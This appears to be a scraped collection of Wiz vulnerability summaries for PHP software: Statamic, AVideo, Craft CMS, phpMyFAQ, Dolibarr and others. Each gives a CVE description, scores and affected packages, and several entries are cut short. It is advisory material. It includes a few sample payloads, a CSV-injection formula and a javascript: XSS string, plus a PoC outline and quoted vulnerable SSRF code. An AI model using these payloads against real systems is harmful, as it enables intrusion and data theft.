Statamic is a Laravel and Git powered content management system (CMS). Prior to 6.6.2, stored XSS in the control panel color mode preference allows authenticated users with control panel access to inject malicious JavaScript that executes when a higher-privileged user impersonates their account. This has been fixed in 6.6.2.
Source : NVD
## 5.4
Score
Published March 13, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar
Wiz
CVE-2026-28501 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-28501 [CRITICAL] CVE-2026-28501 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28501 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Prior to version 24.0, an unauthenticated SQL Injection vulnerability exists in AVideo within the objects/videos.json.php and objects/video.php components. The application fails to properly sanitize the catName parameter when it is supplied via a JSON-formatted POST request body. Because JSON input is parsed and merged into $_REQUEST after global security checks are executed, the payload bypasses the existing sanitization mechanisms. This issue has been patched in version 24.0.
Source : NVD
## 9.8
Score
Published March 6, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due
Wiz
CVE-2026-28805 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-28805 [HIGH] CVE-2026-28805 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28805 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2.
Source : NVD
Wiz
CVE-2026-33039 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33039 [HIGH] CVE-2026-33039 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33039 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 25.0 and below, the plugin/LiveLinks/proxy.php endpoint validates user-supplied URLs against internal/private networks using isSSRFSafeURL(), but only checks the initial URL. When the initial URL responds with an HTTP redirect (Location header), the redirect target is fetched via fakeBrowser() without re-validation, allowing an attacker to reach internal services (cloud metadata, RFC1918 addresses) through an attacker-controlled redirect. This issue is fixed in version 26.0.
Source : NVD
## 8.6
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
Wiz
CVE-2026-34384 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.5
CVE-2026-34384 [MEDIUM] CVE-2026-34384 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34384 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Prior to version 5.0.8, the create_user, assign_member, and assign_user action modes in modules/registration.php approve pending user registrations via GET request without validating a CSRF token. Unlike the delete_user mode in the same file (which correctly validates the token), these three approval actions read their parameters from $_GET and perform irreversible state changes without any protection. An attacker who has submitted a pending registration can extract their own user UUID from the registration confirmation email URL, then trick any user with the rol_approve_users right into visiting a crafted URL that automatically approves the registration. This bypasses the ma
Wiz
CVE-2026-2895 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-2895 [MEDIUM] CVE-2026-2895 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2895 :
PHP vulnerability analysis and mitigation
A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 6.3
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date
Wiz
CVE-2026-31857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-31857 [HIGH] CVE-2026-31857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31857 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.9.9 and 4.17.4, a Remote Code Execution vulnerability exists in the Craft CMS 5 conditions system. The BaseElementSelectConditionRule::getElementIds() method passes user-controlled string input through renderObjectTemplate() -- an unsandboxed Twig rendering function with escaping disabled. Any authenticated Control Panel user (including non-admin roles such as Author or Editor) can achieve full RCE by sending a crafted condition rule via standard element listing endpoints. This vulnerability requires no admin privileges, no special permissions beyond basic control panel access, and bypasses all production hardening settings (allowAdminChanges: false, devMode: false, enable
Wiz
CVE-2023-53929 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2023-53929 [MEDIUM] CVE-2023-53929 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-53929 :
PHP vulnerability analysis and mitigation
phpMyFAQ 3.1.12 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into their profile names. Attackers can modify their user profile name with a payload like 'calc|a!z|' to trigger code execution when an administrator exports user data as a CSV file.
Source : NVD
## 6.2
Score
Published December 17, 2025
Severity MEDIUM
CNA Score 6.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
phpmyfaq/phpmyfaq
thorsten/phpmyfaq
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Jan
Wiz
CVE-2025-71177 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-71177 [MEDIUM] CVE-2025-71177 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71177 :
PHP vulnerability analysis and mitigation
LavaLite CMS versions up to and including 10.1.0 contain a stored cross-site scripting vulnerability in the package creation and search functionality. Authenticated users can supply crafted HTML or JavaScript in the package Name or Description fields that is stored and later rendered without proper output encoding in package search results. When other users view search results that include the malicious package, the injected script executes in their browsers, potentially enabling session hijacking, credential theft, and unauthorized actions in the context of the victim.
Source : NVD
## 5.1
Score
Published January 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Ex
Wiz
CVE-2025-14178 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2025-14178 [MEDIUM] CVE-2025-14178 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14178 :
PHP vulnerability analysis and mitigation
In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, a heap buffer overflow occurs in array_merge() when the total element count of packed arrays exceeds 32-bit limits or HT_MAX_SIZE, due to an integer overflow in the precomputation of element counts using zend_hash_num_elements(). This may lead to memory corruption or crashes and affect the integrity and availability of the target server.
Source : NVD
## 8.2
Score
Published December 27, 2025
Severity HIGH
CNA Score 6.5
Affected Technologies
PHP
Rocky Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Wiz
GHSA-788v-5pfp-93ff Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-788v-5pfp-93ff Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-788v-5pfp-93ff :
PHP vulnerability analysis and mitigation
## Impact
ModalFormResponsePacket
## Patches
The issue was fixed in two parts:
cef1088341e40ee7a6fa079bca47a84f3524d877 limits the size of a single form response to 10 KB, which is well above expected size, but low enough to prevent abuse
f983f4f66d5e72d7a07109c8175799ab0ee771d5 avoids decoding the form response if there is no form associated with the given ID
## Workarounds
DataPacketReceiveEvent
formData
Player->forms
## PoC
Join a PocketMine-MP server as a regular player (no special permissions needed).
ModalFormResponsePacket
formId
formData
The server will attempt to parse the JSON and may freeze or become unresponsive.Example NodeJS pseudocode:
import { createClient } from 'bedrock-protocol';
Wiz
CVE-2026-33628 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-33628 [MEDIUM] CVE-2026-33628 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33628 :
PHP vulnerability analysis and mitigation
purify::clean()
purify::clean()
Source : NVD
## 5.4
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
invoiceninja/invoiceninja
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 25, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published d
Wiz
CVE-2026-33177 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-33177 [MEDIUM] CVE-2026-33177 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33177 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, low-privileged Control Panel users could create taxonomy terms by submitting requests to the field action processing endpoint with attacker-controlled field definitions. This bypasses the authorization checks enforced on the standard taxonomy term creation endpoint. This has been fixed in 5.73.14 and 6.7.0.
Source : NVD
## 4.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages
Wiz
CVE-2026-34731 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-34731 [HIGH] CVE-2026-34731 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34731 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo on_publish_done.php endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so. An attacker can enumerate active stream keys from the unauthenticated stats.json.php endpoint, then send crafted POST requests to on_publish_done.php to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform. At time of publication, there are no publicly available patches.
Source : NVD
## 7.5
Score
Publish
Wiz
CVE-2026-31822 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31822 [MEDIUM] CVE-2026-31822 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31822 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. A cross-site scripting (XSS) vulnerability exists in the shop checkout login form handled by the ApiLoginController Stimulus controller. When a login attempt fails, AuthenticationFailureHandler returns a JSON response whose message field is rendered into the DOM using innerHTML, allowing any HTML or JavaScript in that value to be parsed and executed by the browser. The issue is fixed in versions: 2.0.16, 2.1.12, 2.2.3 and above.
Source : NVD
## 5.3
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perce
Wiz
CVE-2026-24421 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-24421 [MEDIUM] CVE-2026-24421 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24421 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below have flawed authorization logic which exposes the /api/setup/backup endpoint to any authenticated user despite their permissions. SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. Non-admin users can trigger a configuration backup and retrieve its path. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP. This issue is fixed in version 4.0.17.
Source : NVD
## 6.5
Score
Published January 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-35450 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35450 [MEDIUM] CVE-2026-35450 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35450 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/API/check.ffmpeg.json.php endpoint probes the FFmpeg remote server configuration and returns connectivity status without any authentication. All sibling FFmpeg management endpoints (kill.ffmpeg.json.php, list.ffmpeg.json.php, ffmpeg.php) require User::isAdmin().
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No
Wiz
CVE-2026-31859 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-31859 [MEDIUM] CVE-2026-31859 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31859 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). The fix for CVE-2025-35939 in craftcms/cms introduced a strip_tags() call in src/web/User.php to sanitize return URLs before they are stored in the session. However, strip_tags() only removes HTML tags (angle brackets) -- it does not inspect or filter URL schemes. Payloads like javascript:alert(document.cookie) contain no HTML tags and pass through strip_tags() completely unmodified, enabling reflected XSS when the return URL is rendered in an href attribute. This vulnerability is fixed in 5.9.7 and 4.17.3.
Source : NVD
## 6.9
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CI
Wiz
GHSA-7rhv-h82h-vpjh Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-7rhv-h82h-vpjh Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-7rhv-h82h-vpjh :
PHP vulnerability analysis and mitigation
## Vulnerability Allowing MFA Bypass
## Affected EC-CUBE Versions
Versions: 4.1.0 – 4.3.1
## Vulnerability Overview
If an administrator’s ID and password are compromised, an issue exists that allows an attacker to bypass the normally required two-factor authentication (2FA) and log in to the administrative interface.
## Severity and Impact
CVSS v3.1 score
Base score: 6.2 / Temporal score: 5.7 / Environmental score (after mitigation and countermeasures): 0.0
An attacker can forcibly overwrite the 2FA configuration of an account with administrative privileges. As a result, the legitimate administrator can be locked out, while the attacker can log in to the administrative interface and perform unauthorized action
Wiz
CVE-2025-66844 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2025-66844 [CRITICAL] CVE-2025-66844 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66844 :
PHP vulnerability analysis and mitigation
In grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered
Source : NVD
## 9.1
Score
Published December 15, 2025
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
getgrav/grav
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Dec 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what
Wiz
CVE-2026-33159 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-33159 [MEDIUM] CVE-2026-33159 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33159 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, guest users can access Config Sync updater index, obtain signed data, and execute state-changing Config Sync actions (regenerate-yaml, apply-yaml-changes) without authentication. This issue has been patched in versions 4.17.8 and 5.9.14.
Source : NVD
## 6.9
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cpe
Wiz
CVE-2026-34369 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34369 [MEDIUM] CVE-2026-34369 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34369 :
PHP vulnerability analysis and mitigation
get_api_video_file
get_api_video
CustomizeUser::getModeYouTube()
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Wiz
CVE-2025-56421 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-56421 [HIGH] CVE-2025-56421 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-56421 :
PHP vulnerability analysis and mitigation
SQL Injection vulnerability in LimeSurvey before v.6.15.4+250710 allows a remote attacker to obtain sensitive information from the database.
Source : NVD
## 7.5
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
limesurvey/limesurvey
limesurvey
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 12, 2026
Nix Severity HIGH No Fix Added at: Mar 22, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's
Wiz
GHSA-r33w-fg8j-9c94 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-r33w-fg8j-9c94 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-r33w-fg8j-9c94 :
PHP vulnerability analysis and mitigation
## Description
magic_links.action
## Resolution
ActionAbstract
allowed_classes
unserialize()
Source : NVD
## 8.8
Score
Published February 12, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cesargb/laravel-magiclink
Sources
NVD
Composer Severity HIGH Has Fix Added at: Feb 15, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Scor
Wiz
CVE-2026-34613 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34613 [MEDIUM] CVE-2026-34613 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34613 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo endpoint objects/pluginSwitch.json.php allows administrators to enable or disable any installed plugin. The endpoint checks for an active admin session but does not validate a CSRF token. Additionally, the plugins database table is explicitly listed in ignoreTableSecurityCheck(), which means the ORM-level Referer/Origin domain validation in ObjectYPT::save() is also bypassed. Combined with SameSite=None on session cookies, an attacker can disable critical security plugins (such as LoginControl for 2FA, subscription enforcement, or access control plugins) by luring an admin to a malicious page. At time of publication, there are no publicly avai
Wiz
CVE-2026-26045 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-26045 [HIGH] CVE-2026-26045 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26045 :
PHP vulnerability analysis and mitigation
A flaw was identified in Moodle’s backup restore functionality where specially crafted backup files were not properly validated during processing. If a malicious backup file is restored, it could lead to unintended execution of server-side code. Since restore capabilities are typically available to privileged users, exploitation requires authenticated access. Successful exploitation could result in full compromise of the Moodle server.
Source : NVD
## 7.2
Score
Published February 21, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28
Exploitation Probability
Wiz
CVE-2026-32299 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-32299 [HIGH] CVE-2026-32299 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32299 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the page content retrieval feature may allow retrieval of non-public information. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fix Adde
Wiz
CVE-2026-34036 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34036 [MEDIUM] CVE-2026-34036 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34036 :
PHP vulnerability analysis and mitigation
Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Wiz
CVE-2025-69200 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-69200 [HIGH] CVE-2025-69200 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69200 :
PHP vulnerability analysis and mitigation
POST /api/setup/backup
database.php
Source : NVD
## 7.5
Score
Published December 29, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 88.7
Exploitation Probability (EPSS) 4.2
Affected packages and libraries
thorsten/phpmyfaq
Sources
NVD
Composer Severity HIGH Has Fix Added at: Dec 31, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
Wiz
GHSA-wxjx-r2j2-96fx Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-wxjx-r2j2-96fx Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-wxjx-r2j2-96fx :
PHP vulnerability analysis and mitigation
## Summary
plugin/Live/test.php
statsURL
file_get_contents()
curl_exec()
wget
/^http/
isSSRFSafeURL()
## Details
plugin/Live/test.php
$statsURL = $_REQUEST['statsURL'];
if (empty($statsURL) || $statsURL == "php://input" || !preg_match("/^http/", $statsURL)) {
_log('this is not a URL ');
exit;
}
/^http/
if (ini_get('allow_url_fopen')) {
try {
$tmp = file_get_contents($url, false, $context);
_log('file_get_contents:: '.htmlentities($tmp));
Sink — curl_exec (line 73-94):
} elseif (function_exists('curl_init')) {
$ch = curl_init();
// ...
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
// ...
$output = curl_exec($ch);
// ...
_log('curl_init:: '.htmlentities($output));
Wiz
CVE-2026-33651 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33651 [HIGH] CVE-2026-33651 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33651 :
PHP vulnerability analysis and mitigation
remindMe.json.php
$_REQUEST['live_schedule_id']
Scheduler_commands::getAllActiveOrToRepeat()
LIKE
new Live_schedule()
getUsers_idOrCompany()
intval()
ObjectYPT::getFromDb()
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
Wiz
CVE-2026-2896 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-2896 [MEDIUM] CVE-2026-2896 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2896 :
PHP vulnerability analysis and mitigation
A weakness has been identified in funadmin up to 7.1.0-rc4. This affects the function setConfig of the file app/backend/controller/Ajax.php of the component Configuration Handler. Executing a manipulation can lead to improper authorization. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 6.9
Score
Published February 22, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.3
Exploitation Probability
Wiz
CVE-2026-32264 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-32264 [HIGH] CVE-2026-32264 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32264 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.5 and from version 5.0.0-RC1 to before version 5.9.11, there is a Behavior injection RCE vulnerability in ElementIndexesController and FieldsController. Craft control panel administrator permissions and allowAdminChanges must be enabled for this to work. This issue has been patched in versions 4.17.5 and 5.9.11.
Source : NVD
## 8.6
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Affected packages
Wiz
CVE-2026-23494 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-23494 [MEDIUM] CVE-2026-23494 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23494 :
PHP vulnerability analysis and mitigation
Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for reading or listing static routes. In Pimcore, static routes are custom URL patterns defined via the backend interface or the var/config/staticroutes.php file, including details like regex-based patterns, controllers, variables, and priorities. These routes are registered automatically through the PimcoreStaticRoutesBundle and integrated into the MVC routing system. Testing revealed that an authenticated backend user lacking explicit permissions was able to invoke the endpoint (e.g., GET /api/static-routes) and retrieve sensitiv
Wiz
CVE-2026-35540 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35540 [MEDIUM] CVE-2026-35540 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35540 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail 1.6.0 before 1.6.14. Insufficient Cascading Style Sheets (CSS) sanitization in HTML e-mail messages may lead to SSRF or Information Disclosure, e.g., if stylesheet links point to local network hosts.
Source : NVD
## 5.4
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
